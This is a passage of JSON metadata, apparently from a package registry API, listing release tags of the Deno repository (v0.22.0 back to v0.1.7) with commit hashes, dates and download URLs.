/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/